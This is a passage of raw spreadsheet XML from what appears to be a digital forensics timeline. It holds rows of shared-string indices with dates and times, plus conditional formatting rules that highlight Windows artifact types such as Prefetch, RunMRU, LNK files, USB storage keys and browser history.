      <c r="E152" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F152" t="s">
        <v>306</v>
      </c>
      <c r="G152" t="s">
        <v>31</v>
      </c>
      <c r="H152" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="153" spans="1:8">
      <c r="A153" s="7">
        <v>45833</v>
      </c>
      <c r="B153" s="12">
        <v>0.48738425925925927</v>
      </c>
      <c r="C153" t="s">
        <v>25</v>
      </c>
      <c r="D153" t="s">
        <v>29</v>
      </c>
      <c r="E153" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F153" t="s">
        <v>308</v>
      </c>
      <c r="G153" t="s">
        <v>31</v>
      </c>
      <c r="H153" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="154" spans="1:8">
      <c r="A154" s="7">
        <v>45833</v>
      </c>
      <c r="B154" s="12">
        <v>0.48741898148148149</v>
      </c>
      <c r="C154" t="s">
        <v>25</v>
      </c>
      <c r="D154" t="s">
        <v>29</v>
      </c>
      <c r="E154" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F154" t="s">
        <v>310</v>
      </c>
      <c r="G154" t="s">
        <v>31</v>
      </c>
      <c r="H154" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="155" spans="1:8">
      <c r="A155" s="7">
        <v>45833</v>
      </c>
      <c r="B155" s="12">
        <v>0.48749999999999999</v>
      </c>
      <c r="C155" t="s">
        <v>25</v>
      </c>
      <c r="D155" t="s">
        <v>29</v>
      </c>
      <c r="E155" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F155" t="s">
        <v>312</v>
      </c>
      <c r="G155" t="s">
        <v>31</v>
      </c>
      <c r="H155" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="156" spans="1:8">
      <c r="A156" s="7">
        <v>45833</v>
      </c>
      <c r="B156" s="12">
        <v>0.48751157407407408</v>
      </c>
      <c r="C156" t="s">
        <v>121</v>
      </c>
      <c r="D156" t="s">
        <v>83</v>
      </c>
      <c r="E156" t="s">
        <v>14</v>
      </c>
      <c r="F156" t="s">
        <v>130</v>
      </c>
      <c r="G156" t="s">
        <v>123</v>
      </c>
      <c r="H156" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="157" spans="1:8">
      <c r="A157" s="7">
        <v>45833</v>
      </c>
      <c r="B157" s="12">
        <v>0.48751157407407408</v>
      </c>
      <c r="C157" t="s">
        <v>147</v>
      </c>
      <c r="D157" t="s">
        <v>21</v>
      </c>
      <c r="E157" t="s">
        <v>17</v>
      </c>
      <c r="F157" t="s">
        <v>175</v>
      </c>
      <c r="G157" t="s">
        <v>16</v>
      </c>
      <c r="H157" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="158" spans="1:8">
      <c r="A158" s="7">
        <v>45833</v>
      </c>
      <c r="B158" s="14">
        <v>0.48751157407407408</v>
      </c>
      <c r="C158" t="s">
        <v>147</v>
      </c>
      <c r="D158" t="s">
        <v>21</v>
      </c>
      <c r="E158" t="s">
        <v>17</v>
      </c>
      <c r="F158" t="s">
        <v>256</v>
      </c>
      <c r="G158" t="s">
        <v>16</v>
      </c>
      <c r="H158" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="159" spans="1:8">
      <c r="A159" s="7">
        <v>45833</v>
      </c>
      <c r="B159" s="12">
        <v>0.48754629629629631</v>
      </c>
      <c r="C159" t="s">
        <v>25</v>
      </c>
      <c r="D159" t="s">
        <v>29</v>
      </c>
      <c r="E159" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F159" t="s">
        <v>314</v>
      </c>
      <c r="G159" t="s">
        <v>31</v>
      </c>
      <c r="H159" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="160" spans="1:8">
      <c r="A160" s="7">
        <v>45833</v>
      </c>
      <c r="B160" s="12">
        <v>0.48759259259259258</v>
      </c>
      <c r="C160" t="s">
        <v>25</v>
      </c>
      <c r="D160" t="s">
        <v>29</v>
      </c>
      <c r="E160" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F160" t="s">
        <v>316</v>
      </c>
      <c r="G160" t="s">
        <v>31</v>
      </c>
      <c r="H160" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="161" spans="1:8">
      <c r="A161" s="7">
        <v>45833</v>
      </c>
      <c r="B161" s="12">
        <v>0.48799768518518516</v>
      </c>
      <c r="C161" t="s">
        <v>25</v>
      </c>
      <c r="D161" t="s">
        <v>21</v>
      </c>
      <c r="E161" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F161" s="13" t="s">
        <v>66</v>
      </c>
      <c r="G161" t="s">
        <v>16</v>
      </c>
      <c r="H161" s="13" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="162" spans="1:8">
      <c r="A162" s="7">
        <v>45833</v>
      </c>
      <c r="B162" s="12">
        <v>0.48800925925925925</v>
      </c>
      <c r="C162" t="s">
        <v>147</v>
      </c>
      <c r="D162" t="s">
        <v>21</v>
      </c>
      <c r="E162" t="s">
        <v>17</v>
      </c>
      <c r="F162" t="s">
        <v>176</v>
      </c>
      <c r="G162" t="s">
        <v>16</v>
      </c>
      <c r="H162" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="163" spans="1:8">
      <c r="A163" s="7">
        <v>45833</v>
      </c>
      <c r="B163" s="14">
        <v>0.48800925925925925</v>
      </c>
      <c r="C163" t="s">
        <v>147</v>
      </c>
      <c r="D163" t="s">
        <v>21</v>
      </c>
      <c r="E163" t="s">
        <v>17</v>
      </c>
      <c r="F163" t="s">
        <v>254</v>
      </c>
      <c r="G163" t="s">
        <v>16</v>
      </c>
      <c r="H163" t="s">
        <v>255</v>
      </c>
    </row>
    <row r="164" spans="1:8">
      <c r="A164" s="7">
        <v>45833</v>
      </c>
      <c r="B164" s="12">
        <v>0.48906250000000001</v>
      </c>
      <c r="C164" t="s">
        <v>25</v>
      </c>
      <c r="D164" t="s">
        <v>21</v>
      </c>
      <c r="E164" s="8" t="s">
        <v>15</v>
      </c>
      <c r="F164" t="s">
        <v>68</v>
      </c>
      <c r="G164" t="s">
        <v>54</v>
      </c>
      <c r="H164" s="13" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="165" spans="1:8">
      <c r="A165" s="7">
        <v>45833</v>
      </c>
      <c r="B165" s="12">
        <v>0.48909722222222224</v>
      </c>
      <c r="C165" t="s">
        <v>121</v>
      </c>
      <c r="D165" t="s">
        <v>83</v>
      </c>
      <c r="E165" t="s">
        <v>14</v>
      </c>
      <c r="F165" t="s">
        <v>132</v>
      </c>
      <c r="G165" t="s">
        <v>123</v>
      </c>
      <c r="H165" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="166" spans="1:8">
      <c r="A166" s="7">
        <v>45833</v>
      </c>
      <c r="B166" s="12">
        <v>0.48954861111111109</v>
      </c>
      <c r="C166" t="s">
        <v>121</v>
      </c>
      <c r="D166" t="s">
        <v>83</v>
      </c>
      <c r="E166" t="s">
        <v>14</v>
      </c>
      <c r="F166" t="s">
        <v>134</v>
      </c>
      <c r="G166" t="s">
        <v>123</v>
      </c>
      <c r="H166" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="167" spans="1:8">
      <c r="A167" s="7">
        <v>45833</v>
      </c>
      <c r="B167" s="12">
        <v>0.48954861111111109</v>
      </c>
      <c r="C167" t="s">
        <v>147</v>
      </c>
      <c r="D167" t="s">
        <v>21</v>
      </c>
      <c r="E167" t="s">
        <v>17</v>
      </c>
      <c r="F167" t="s">
        <v>178</v>
      </c>
      <c r="G167" t="s">
        <v>16</v>
      </c>
      <c r="H167" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="168" spans="1:8">
      <c r="A168" s="7">
        <v>45833</v>
      </c>
      <c r="B168" s="14">
        <v>0.48954861111111109</v>
      </c>
      <c r="C168" t="s">
        <v>147</v>
      </c>
      <c r="D168" t="s">
        <v>21</v>
      </c>
      <c r="E168" t="s">
        <v>17</v>
      </c>
      <c r="F168" t="s">
        <v>252</v>
      </c>
      <c r="G168" t="s">
        <v>16</v>
      </c>
      <c r="H168" t="s">
        <v>253</v>
      </c>
    </row>
    <row r="169" spans="1:8">
      <c r="A169" s="7">
        <v>45833</v>
      </c>
      <c r="B169" s="12">
        <v>0.48954861111111109</v>
      </c>
      <c r="C169" t="s">
        <v>20</v>
      </c>
      <c r="D169" t="s">
        <v>21</v>
      </c>
      <c r="E169" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F169" t="s">
        <v>23</v>
      </c>
      <c r="G169" t="s">
        <v>16</v>
      </c>
      <c r="H169" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="170" spans="1:8">
      <c r="A170" s="7">
        <v>45833</v>
      </c>
      <c r="B170" s="12">
        <v>0.48987268518518517</v>
      </c>
      <c r="D170" s="13" t="s">
        <v>21</v>
      </c>
      <c r="E170" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F170" s="13" t="s">
        <v>70</v>
      </c>
      <c r="G170" t="s">
        <v>16</v>
      </c>
      <c r="H170" s="13" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="171" spans="1:8">
      <c r="A171" s="7">
        <v>45833</v>
      </c>
      <c r="B171" s="12">
        <v>0.48996527777777776</v>
      </c>
      <c r="C171" t="s">
        <v>121</v>
      </c>
      <c r="D171" t="s">
        <v>83</v>
      </c>
      <c r="E171" t="s">
        <v>14</v>
      </c>
      <c r="F171" t="s">
        <v>136</v>
      </c>
      <c r="G171" t="s">
        <v>123</v>
      </c>
      <c r="H171" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="172" spans="1:8">
      <c r="A172" s="7">
        <v>45833</v>
      </c>
      <c r="B172" s="12">
        <v>0.48996527777777776</v>
      </c>
      <c r="C172" t="s">
        <v>147</v>
      </c>
      <c r="D172" t="s">
        <v>21</v>
      </c>
      <c r="E172" t="s">
        <v>17</v>
      </c>
      <c r="F172" t="s">
        <v>179</v>
      </c>
      <c r="G172" t="s">
        <v>16</v>
      </c>
      <c r="H172" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="173" spans="1:8">
      <c r="A173" s="7">
        <v>45833</v>
      </c>
      <c r="B173" s="14">
        <v>0.48996527777777776</v>
      </c>
      <c r="C173" t="s">
        <v>147</v>
      </c>
      <c r="D173" t="s">
        <v>21</v>
      </c>
      <c r="E173" t="s">
        <v>17</v>
      </c>
      <c r="F173" t="s">
        <v>248</v>
      </c>
      <c r="G173" t="s">
        <v>16</v>
      </c>
      <c r="H173" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="174" spans="1:8">
      <c r="A174" s="7">
        <v>45833</v>
      </c>
      <c r="B174" s="12">
        <v>0.49033564814814817</v>
      </c>
      <c r="C174" t="s">
        <v>121</v>
      </c>
      <c r="D174" t="s">
        <v>83</v>
      </c>
      <c r="E174" t="s">
        <v>14</v>
      </c>
      <c r="F174" t="s">
        <v>138</v>
      </c>
      <c r="G174" t="s">
        <v>123</v>
      </c>
      <c r="H174" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="175" spans="1:8">
      <c r="A175" s="7">
        <v>45833</v>
      </c>
      <c r="B175" s="12">
        <v>0.49033564814814817</v>
      </c>
      <c r="C175" t="s">
        <v>147</v>
      </c>
      <c r="D175" t="s">
        <v>21</v>
      </c>
      <c r="E175" t="s">
        <v>17</v>
      </c>
      <c r="F175" t="s">
        <v>181</v>
      </c>
      <c r="G175" t="s">
        <v>16</v>
      </c>
      <c r="H175" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="176" spans="1:8">
      <c r="A176" s="7">
        <v>45833</v>
      </c>
      <c r="B176" s="14">
        <v>0.49033564814814817</v>
      </c>
      <c r="C176" t="s">
        <v>147</v>
      </c>
      <c r="D176" t="s">
        <v>21</v>
      </c>
      <c r="E176" t="s">
        <v>17</v>
      </c>
      <c r="F176" t="s">
        <v>250</v>
      </c>
      <c r="G176" t="s">
        <v>16</v>
      </c>
      <c r="H176" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="177" spans="1:8">
      <c r="A177" s="7">
        <v>45833</v>
      </c>
      <c r="B177" s="12">
        <v>0.49047453703703703</v>
      </c>
      <c r="D177" s="13" t="s">
        <v>21</v>
      </c>
      <c r="E177" s="8" t="s">
        <v>17</v>
      </c>
      <c r="F177" s="13" t="s">
        <v>72</v>
      </c>
      <c r="G177" t="s">
        <v>16</v>
      </c>
      <c r="H177" s="13" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="178" spans="1:8">
      <c r="A178" s="7">
        <v>45833</v>
      </c>
      <c r="B178" s="12">
        <v>0.49062499999999998</v>
      </c>
      <c r="C178" t="s">
        <v>121</v>
      </c>
      <c r="D178" t="s">
        <v>29</v>
      </c>
      <c r="E178" t="s">
        <v>14</v>
      </c>
      <c r="F178" t="s">
        <v>140</v>
      </c>
      <c r="G178" t="s">
        <v>123</v>
      </c>
      <c r="H178" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="179" spans="1:8">
      <c r="A179" s="7">
        <v>45833</v>
      </c>
      <c r="B179" s="12">
        <v>0.49134259259259261</v>
      </c>
      <c r="D179" s="13" t="s">
        <v>21</v>
      </c>
      <c r="E179" s="8" t="s">
        <v>15</v>
      </c>
      <c r="F179" t="s">
        <v>74</v>
      </c>
      <c r="G179" t="s">
        <v>54</v>
      </c>
      <c r="H179" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="180" spans="1:8">
      <c r="A180" s="7">
        <v>45833</v>
      </c>
      <c r="B180" s="12">
        <v>0.49194444444444446</v>
      </c>
      <c r="D180" t="s">
        <v>29</v>
      </c>
      <c r="E180" s="8" t="s">
        <v>14</v>
      </c>
      <c r="F180" t="s">
        <v>76</v>
      </c>
      <c r="G180" t="s">
        <v>31</v>
      </c>
      <c r="H180" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="181" spans="1:8">
      <c r="A181" s="7">
        <v>45833</v>
      </c>
      <c r="B181" s="12">
        <v>0.57260416666666669</v>
      </c>
      <c r="C181" t="s">
        <v>142</v>
      </c>
      <c r="D181" t="s">
        <v>326</v>
      </c>
      <c r="E181" s="8" t="s">
        <v>327</v>
      </c>
      <c r="F181" t="s">
        <v>331</v>
      </c>
      <c r="G181" t="s">
        <v>329</v>
      </c>
      <c r="H181" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="182" spans="1:8">
      <c r="A182" s="7">
        <v>45821</v>
      </c>
      <c r="B182" s="12">
        <v>0.5905555555555555</v>
      </c>
      <c r="C182" t="s">
        <v>206</v>
      </c>
      <c r="D182" t="s">
        <v>333</v>
      </c>
      <c r="E182" s="8" t="s">
        <v>327</v>
      </c>
      <c r="F182" t="s">
        <v>334</v>
      </c>
      <c r="G182" t="s">
        <v>329</v>
      </c>
      <c r="H182" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="183" spans="1:8">
      <c r="A183" s="7">
        <v>45821</v>
      </c>
      <c r="B183" s="12">
        <v>0.64225694444444448</v>
      </c>
      <c r="C183" t="s">
        <v>142</v>
      </c>
      <c r="D183" t="s">
        <v>326</v>
      </c>
      <c r="E183" s="8" t="s">
        <v>327</v>
      </c>
      <c r="F183" t="s">
        <v>328</v>
      </c>
      <c r="G183" t="s">
        <v>329</v>
      </c>
      <c r="H183" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="184" spans="1:8">
      <c r="A184" s="7">
        <v>45833</v>
      </c>
      <c r="B184" s="12" t="s">
        <v>25</v>
      </c>
      <c r="C184" t="s">
        <v>25</v>
      </c>
      <c r="D184" t="s">
        <v>333</v>
      </c>
      <c r="E184" s="8" t="s">
        <v>339</v>
      </c>
      <c r="F184" t="s">
        <v>343</v>
      </c>
      <c r="G184" t="s">
        <v>341</v>
      </c>
      <c r="H184" t="s">
        <v>344</v>
      </c>
    </row>
    <row r="185" spans="1:8">
      <c r="A185" s="7">
        <v>45833</v>
      </c>
      <c r="B185" s="12" t="s">
        <v>25</v>
      </c>
      <c r="C185" t="s">
        <v>25</v>
      </c>
      <c r="D185" t="s">
        <v>333</v>
      </c>
      <c r="E185" s="8" t="s">
        <v>339</v>
      </c>
      <c r="F185" t="s">
        <v>345</v>
      </c>
      <c r="G185" t="s">
        <v>341</v>
      </c>
      <c r="H185" t="s">
        <v>346</v>
      </c>
    </row>
  </sheetData>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:I185">
    <sortCondition ref="B1:B185"/>
  </sortState>
  <conditionalFormatting sqref="A30:N1048576 A2:A153 D19">
    <cfRule type="cellIs" dxfId="75" priority="10" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D28">
    <cfRule type="cellIs" dxfId="74" priority="3" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D24:E24 B23:E23 E25:G25 E26:E28 E29:N29 G17:G24 A1:N2 A3:C5 H3:N5 A6:E6 G6 I6:N10 E7 A7:C9 E9 G9 A10:G10 A11:N14 A15:E15 G15:N15 A16:N16 A17:E17 I17:N28 A18:C19 E18:E19 A20:E20 A21:C21 E21 A22:E22 A23:C29">
    <cfRule type="cellIs" dxfId="73" priority="30" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1:E2 E6:E7 E9:E1048576">
    <cfRule type="containsText" dxfId="72" priority="58" operator="containsText" text="LOG">
      <formula>NOT(ISERROR(SEARCH("LOG",E1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="71" priority="96" operator="equal">
      <formula>"PRE"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E9:E1048576 E1:E2 E6:E7">
    <cfRule type="cellIs" dxfId="70" priority="38" operator="equal">
      <formula>"WEBHIST"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E24">
    <cfRule type="cellIs" dxfId="69" priority="15" operator="equal">
      <formula>"WEBHIST"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="68" priority="17" operator="containsText" text="LOG">
      <formula>NOT(ISERROR(SEARCH("LOG",E24)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="67" priority="18" operator="equal">
      <formula>"PRE"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E80:E95">
    <cfRule type="cellIs" dxfId="66" priority="1" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="65" priority="2" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",E80)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E1:G2 E10:G14 E16:G16 E25:G25 G6 G9 G15 G17:G27 E6:E7 E9 E15 E17:E29">
    <cfRule type="containsText" dxfId="64" priority="49" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",E1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E29:G1048576 E23:E26">
    <cfRule type="containsText" dxfId="63" priority="14" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",E23)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F1:F2 F10:F14 F16 F25 F29:F1048576">
    <cfRule type="cellIs" dxfId="62" priority="97" operator="equal">
      <formula>"UserAssist key"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="61" priority="100" operator="containsText" text="Prefetch">
      <formula>NOT(ISERROR(SEARCH("Prefetch",F1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="60" priority="101" operator="equal">
      <formula>"XP Prefetch"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="59" priority="88" operator="equal">
      <formula>"MountPoints2 key"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="58" priority="51" operator="containsText" text="Flash Cookie">
      <formula>NOT(ISERROR(SEARCH("Flash Cookie",F1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="57" priority="86" operator="equal">
      <formula>"RecentDocs key"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="56" priority="35" operator="containsText" text="RunMRU key">
      <formula>NOT(ISERROR(SEARCH("RunMRU key",F1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="55" priority="36" operator="containsText" text="Firefox 3 history">
      <formula>NOT(ISERROR(SEARCH("Firefox 3 history",F1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="54" priority="39" operator="equal">
      <formula>"Internet Explorer"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="53" priority="84" operator="containsText" text="Shortcut LNK">
      <formula>NOT(ISERROR(SEARCH("Shortcut LNK",F1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="52" priority="44" operator="containsText" text="Log">
      <formula>NOT(ISERROR(SEARCH("Log",F1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="51" priority="77" operator="containsText" text="SetupAPI Log">
      <formula>NOT(ISERROR(SEARCH("SetupAPI Log",F1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="50" priority="56" operator="containsText" text="XP Firewall Log">
      <formula>NOT(ISERROR(SEARCH("XP Firewall Log",F1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="49" priority="90" operator="equal">
      <formula>"Deleted Registry"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="48" priority="91" operator="equal">
      <formula>"$Recycle.bin"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G1:G2 G6 G9:G27 G29:G1048576">
    <cfRule type="containsText" dxfId="47" priority="41" operator="containsText" text="URL">
      <formula>NOT(ISERROR(SEARCH("URL",G1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="46" priority="34" operator="containsText" text="CMD typed">
      <formula>NOT(ISERROR(SEARCH("CMD typed",G1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="45" priority="92" operator="containsText" text="Folder Opened">
      <formula>NOT(ISERROR(SEARCH("Folder Opened",G1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="44" priority="83" operator="containsText" text="File Opened">
      <formula>NOT(ISERROR(SEARCH("File Opened",G1)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="43" priority="98" operator="equal">
      <formula>"Time of Launch"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="42" priority="57" operator="containsText" text="Drive last mounted">
      <formula>NOT(ISERROR(SEARCH("Drive last mounted",G1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="41" priority="94" operator="containsText" text="Last run">
      <formula>NOT(ISERROR(SEARCH("Last run",G1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G24">
    <cfRule type="containsText" dxfId="40" priority="9" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",G24)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="39" priority="8" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G26:G27">
    <cfRule type="cellIs" dxfId="38" priority="6" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G27">
    <cfRule type="cellIs" dxfId="37" priority="4" operator="equal">
      <formula>"LNK"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="36" priority="5" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",G27)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J1:J1048576">
    <cfRule type="containsText" dxfId="35" priority="69" operator="containsText" text="URL">
      <formula>NOT(ISERROR(SEARCH("URL",J1)))</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="34" priority="70" operator="beginsWith" text="Flash Cookie">
      <formula>LEFT(J1,LEN("Flash Cookie"))="Flash Cookie"</formula>
    </cfRule>
    <cfRule type="endsWith" dxfId="33" priority="73" operator="endsWith" text="drive mounted">
      <formula>RIGHT(J1,LEN("drive mounted"))="drive mounted"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="32" priority="76" operator="containsText" text="ShellNoRoam/Bags">
      <formula>NOT(ISERROR(SEARCH("ShellNoRoam/Bags",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="31" priority="78" operator="containsText" text="BagMRU">
      <formula>NOT(ISERROR(SEARCH("BagMRU",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="30" priority="79" operator="containsText" text="RemovableMedia">
      <formula>NOT(ISERROR(SEARCH("RemovableMedia",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="29" priority="80" operator="containsText" text="STORAGE/RemovableMedia">
      <formula>NOT(ISERROR(SEARCH("STORAGE/RemovableMedia",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="28" priority="81" operator="containsText" text="USB">
      <formula>NOT(ISERROR(SEARCH("USB",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="27" priority="82" operator="containsText" text="/USB/Vid_">
      <formula>NOT(ISERROR(SEARCH("/USB/Vid_",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="26" priority="87" operator="containsText" text="volume mounted">
      <formula>NOT(ISERROR(SEARCH("volume mounted",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="25" priority="89" operator="containsText" text="DELETED">
      <formula>NOT(ISERROR(SEARCH("DELETED",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="24" priority="31" operator="containsText" text="opened by">
      <formula>NOT(ISERROR(SEARCH("opened by",J1)))</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="23" priority="32" operator="beginsWith" text="URL:file:///">
      <formula>LEFT(J1,LEN("URL:file:///"))="URL:file:///"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="22" priority="37" operator="containsText" text="CreateDate">
      <formula>NOT(ISERROR(SEARCH("CreateDate",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="21" priority="85" operator="containsText" text="Enum/USBSTOR/Disk&amp;Ven_">
      <formula>NOT(ISERROR(SEARCH("Enum/USBSTOR/Disk&amp;Ven_",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="20" priority="95" operator="containsText" text="MUICache">
      <formula>NOT(ISERROR(SEARCH("MUICache",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="19" priority="48" operator="containsText" text="visited file://">
      <formula>NOT(ISERROR(SEARCH("visited file://",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="18" priority="54" operator="containsText" text="Recently opened file">
      <formula>NOT(ISERROR(SEARCH("Recently opened file",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="17" priority="55" operator="containsText" text="RunMRU">
      <formula>NOT(ISERROR(SEARCH("RunMRU",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="16" priority="99" operator="containsText" text="UEME_">
      <formula>NOT(ISERROR(SEARCH("UEME_",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="15" priority="75" operator="containsText" text="UEME_RUNPIDL">
      <formula>NOT(ISERROR(SEARCH("UEME_RUNPIDL",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="14" priority="59" operator="containsText" text="visited">
      <formula>NOT(ISERROR(SEARCH("visited",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="13" priority="102" operator="containsText" text="UEME_RUNPATH">
      <formula>NOT(ISERROR(SEARCH("UEME_RUNPATH",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="12" priority="106" operator="containsText" text="was executed">
      <formula>NOT(ISERROR(SEARCH("was executed",J1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J1:K1048576 M1:M1048576">
    <cfRule type="containsText" dxfId="11" priority="93" operator="containsText" text=".pf">
      <formula>NOT(ISERROR(SEARCH(".pf",J1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J1:M1048576">
    <cfRule type="containsText" dxfId="10" priority="71" operator="containsText" text="RECYCLE">
      <formula>NOT(ISERROR(SEARCH("RECYCLE",J1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="9" priority="53" operator="containsText" text=".lnk">
      <formula>NOT(ISERROR(SEARCH(".lnk",J1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K1:K1048576">
    <cfRule type="beginsWith" dxfId="8" priority="46" operator="beginsWith" text="[DELETED]">
      <formula>LEFT(K1,LEN("[DELETED]"))="[DELETED]"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="7" priority="45" operator="containsText" text="LSO">
      <formula>NOT(ISERROR(SEARCH("LSO",K1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="6" priority="43" operator="containsText" text="http://">
      <formula>NOT(ISERROR(SEARCH("http://",K1)))</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="5" priority="40" operator="beginsWith" text="URL">
      <formula>LEFT(K1,LEN("URL"))="URL"</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="4" priority="33" operator="beginsWith" text="typed the following cmd">
      <formula>LEFT(K1,LEN("typed the following cmd"))="typed the following cmd"</formula>
    </cfRule>
    <cfRule type="endsWith" dxfId="3" priority="47" operator="endsWith" text="drive mounted">
      <formula>RIGHT(K1,LEN("drive mounted"))="drive mounted"</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="29" operator="containsText" text="URL:file:///">
      <formula>NOT(ISERROR(SEARCH("URL:file:///",K1)))</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="1" priority="72" operator="beginsWith" text="file:///">
      <formula>LEFT(K1,LEN("file:///"))="file:///"</formula>
    </cfRule>
